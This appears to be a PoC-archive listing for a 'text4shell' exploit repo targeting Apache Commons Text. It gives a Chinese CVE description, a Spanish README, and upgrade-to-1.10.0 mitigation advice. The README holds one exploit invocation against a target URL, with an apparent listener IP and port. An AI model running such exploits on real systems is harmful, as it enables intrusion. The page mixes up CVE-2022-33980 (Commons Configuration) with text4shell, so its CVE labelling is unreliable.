Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-33980 PoC — Apache Commons Configuration 代码注入漏洞

Source
Associated Vulnerability
Title:Apache Commons Configuration 代码注入漏洞 (CVE-2022-33980)
Description:Apache Commons Configuration是美国阿帕奇(Apache)基金会的一款通用的配置接口,它主要用于使Java应用程序从多种来源读取配置数据。 Apache Commons 2.4至2.7版本存在代码注入漏洞,该漏洞源于Apache Commons配置执行变量插值,允许动态评估和扩展属性。插值的标准格式是"${prefix:name}",其中 "prefix "用于定位执行插值的org.apache.commons.configuration2.interpol.Lookup的实例。
Description
text4shell script for text coomons < =1.10 CVE-2022-33980
Readme
# riskootext4shell
text4shell script for text coomons &lt; =1.10 CVE-2022-33980


- La biblioteca Apache Commons Text es una librería alternativa a las funcionalidades nativas del JDK de Java . 
- Versiones previas a versión 1.10.0 de apache commons
- Similar a CVE-2022-33980

```bash
python3 text4shell.py -u http://192.168.245.111:8080/search?query= -i 192.168.111.186 -p 22
```



## Mitigación


La solución principal consiste en actualizar urgentemente el componente Apache Commons Text a las versiones disponibles que corrigen esta vulnerabilidad. Concretamente, se debe actualizar a una versión 1.10.0 o posterior de Apache Commons Text.

En esta actualización, se ha optado por deshabilitar por defecto aquellas sustituciones problemáticas. En el fichero changelog de la librería se incluye el siguiente cambio:

Make default string lookups configurable vía system property. Remove dns, url, and script lookups from defaults. If these lookups are required for use in StringSubstitutor.createInterpolator(), they must be enabled vía system property. See StringLookupFactory for details.

Desde Apache se ha publicado un comunicado con la información oficial y una referencia a la actualización en la que se corrige el problema.
File Snapshot

[4.0K] /data/pocs/3f50dc1a03e5e3a72e3d658e7333bf2f6dddd238 ├── [1.1K] LICENSE ├── [1.2K] README.md └── [4.0K] text4shell.py 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.